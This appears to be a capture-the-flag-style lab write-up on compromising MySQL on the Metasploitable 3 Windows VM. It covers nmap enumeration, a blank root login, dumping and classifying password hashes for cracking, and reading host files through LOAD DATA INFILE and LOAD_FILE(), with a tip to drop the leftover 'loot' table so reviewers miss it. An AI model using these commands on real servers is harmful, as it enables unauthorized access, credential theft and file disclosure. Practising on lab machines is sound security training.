Metasploitable 3 — MySQL Blank Creds and Local File Read
Everybody loves a database until it gets pwned with two commands by your local script kiddie. Let’s work on the Metasploitable 3 Windows Server 2008 VM once again to kick off some practice.
Enumeration
With no hesitation, we launch all of nmap’s mysql enumeration scripts to gain as much information about the target as we can. -Pn skips host discovery and goes straight to the port, and the script glob is quoted so the shell can’t expand it against files in the current directory.
nmap -Pn -p3306 --script="mysql-*" TARGETIP -v
Blank root Password
This gave us “root:<empty> - Valid credentials” from the mysql-enum nmap script. One caveat when reading that line: mysql-enum only enumerates usernames and prints <empty> as a placeholder for the password it never tested, so by itself it proves the root account exists, not that it is passwordless. The blank password is what mysql-empty-password confirms (it reports that the root account has an empty password), and the login itself settles it.
Let’s connect to the mysql service on the Metasploitable 3 system from here. The client would not connect until SSL was disabled, hence --ssl=FALSE (on a MySQL 5.7+ client the equivalent is --ssl-mode=DISABLED). -p prompts for a password; just press Enter.
mysql -u root -h TARGETIP -p --ssl=FALSE
MySQL User Enumeration
# Get the current user's (and all users') privileges and hashes.
# The password column is MySQL 5.5 naming; 5.7+ calls it authentication_string.
use mysql;
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;
# Full dump of every account, including host, file_priv and the auth plugin
SELECT * FROM mysql.user;
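The queries above dump everything; the audit I actually run once I am inside mysql.user is narrower and answers three questions: who has no password, who can log in from anywhere, and who holds the privileges that turn a database login into file access on the host. This is an added example, not part of the original post, and it assumes the MySQL 5.5 schema (the `password` column and the 41-character mysql_native_password hash format).

```sql
-- Added example (not from the original post): account audit against mysql.user.
-- Assumes MySQL 5.5 (password column; 5.7+ renamed it authentication_string).

-- 1. Accounts with no password at all (what mysql-empty-password finds)
SELECT user, host
FROM mysql.user
WHERE password = '';

-- 2. Accounts reachable from somewhere other than the box itself.
--    A host of '%' means "anywhere", which is why our remote root login worked.
SELECT user, host
FROM mysql.user
WHERE host NOT IN ('localhost', '127.0.0.1', '::1');

-- 3. Who can read/write files on the server (FILE), bypass limits (SUPER) or
--    hand privileges to others (GRANT): these are the hashes worth cracking.
SELECT user, host, file_priv, super_priv, grant_priv, process_priv
FROM mysql.user
WHERE file_priv = 'Y' OR super_priv = 'Y' OR grant_priv = 'Y';

-- 4. Classify each hash so you know what to feed to john/hashcat:
--    '*' + 40 hex chars = mysql_native_password (SHA1 of SHA1),
--    16 hex chars       = pre-4.1 old_password
SELECT user, host, password,
       CASE
         WHEN password = '' THEN 'blank'
         WHEN password LIKE '*%' AND LENGTH(password) = 41 THEN 'mysql_native_password'
         WHEN LENGTH(password) = 16 THEN 'old_password (pre-4.1)'
         ELSE 'other/plugin'
       END AS hash_type
FROM mysql.user;

-- 5. Exact grants for the account we are using right now
SHOW GRANTS FOR CURRENT_USER();
```

Query 3 is the one that decides the next step: without FILE on the account you are holding, the local file read in the next section does not work no matter how the path is written.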
Local File Read
# Reading local files on the target system.
# A relative path in LOAD DATA INFILE (without LOCAL) is resolved from the
# server's data directory, so the ../ chain walks up to the drive root.
use test;
CREATE TABLE test (text VARCHAR(100));
Query OK, 0 rows affected (0.230 sec)
# FIELDS TERMINATED BY '\n' matches the line terminator, so each whole line
# lands in the single column instead of being split on tabs
LOAD DATA INFILE '../../../../../../../../../\\Windows\\System32\\drivers\\etc\\hosts' INTO TABLE test FIELDS TERMINATED BY '\n';
Query OK, 23 rows affected (0.163 sec)
Records: 23 Deleted: 0 Skipped: 0 Warnings: 0
select * from test;
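Before firing the file read I check the preconditions, and I use a slightly sturdier version of the scratch table than the one above: VARCHAR(100) truncates any line over 100 characters (silently in the default non-strict sql_mode, with an error in strict mode), the default escape character mangles backslashes, and there is no ordering column. This is an added example, not from the original post; it assumes the same target (MySQL 5.5.20 on Windows, connected as root) and uses C:/Windows/win.ini as a second sample file only because it exists on every Windows install.

```sql
-- Added example (not from the original post): preconditions for a server-side
-- file read, then two variants of the read. Assumes MySQL 5.5 on Windows,
-- connected as root; C:/Windows/win.ini is just a file every Windows box has.

-- 1. Preconditions. LOAD DATA INFILE (non-LOCAL) and LOAD_FILE() both need the
--    FILE privilege (ALL PRIVILEGES ON *.* includes it). secure_file_priv, when
--    non-empty, pins server-side reads to that one directory. @@datadir is the
--    directory the relative ../ chain in the post starts from.
SHOW GRANTS FOR CURRENT_USER();
SELECT @@version, @@version_compile_os, @@datadir, @@secure_file_priv;

-- 2. LOAD_FILE(): no scratch table, absolute path, forward slashes are fine on
--    Windows. It returns NULL instead of an error when the file is missing,
--    not readable by the mysqld service account, larger than max_allowed_packet
--    or outside secure_file_priv, so test for NULL explicitly.
SELECT LOAD_FILE('C:/Windows/System32/drivers/etc/hosts') IS NULL AS blocked;
SELECT LOAD_FILE('C:/Windows/win.ini') AS win_ini;

-- 3. Scratch-table variant, hardened versus the post's:
--    * TEXT instead of VARCHAR(100): no truncation of long lines
--    * FIELDS TERMINATED BY '\n' (same as the line terminator) keeps tabs
--      in the file from being treated as column separators
--    * ESCAPED BY '' stores backslashes literally (think C:\ paths in .ini files)
--    * an id column so SELECT can return lines in file order
CREATE TABLE test.loot (
  id   INT AUTO_INCREMENT PRIMARY KEY,
  line TEXT
);
LOAD DATA INFILE 'C:/Windows/System32/drivers/etc/hosts'
  INTO TABLE test.loot
  FIELDS TERMINATED BY '\n' ESCAPED BY ''
  LINES TERMINATED BY '\n'
  (line);
-- Windows files are CRLF; the '\n' line terminator leaves a trailing \r
SELECT id, TRIM(TRAILING '\r' FROM line) AS line
FROM test.loot
ORDER BY id;

-- 4. Clean up: a leftover table in `test` is noise for the next tester and an
--    obvious artefact for anyone reviewing the box afterwards.
DROP TABLE test.loot;
```

If the `blocked` query returns 1, check @@secure_file_priv and the service account before assuming the path is wrong; on this 5.5 build the variable is empty by default, which is exactly why the relative-path trick in the post works.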
We were then able to escape the server’s data directory under “c:\wamp\bin\mysql\mysql5.5.20\” on the target and read the hosts file. This works because root holds the FILE privilege, secure_file_priv is not set on this build, and the mysqld service account can read the file; any one of those being different would stop it.
How much further would you go?
Happy Hacking XD!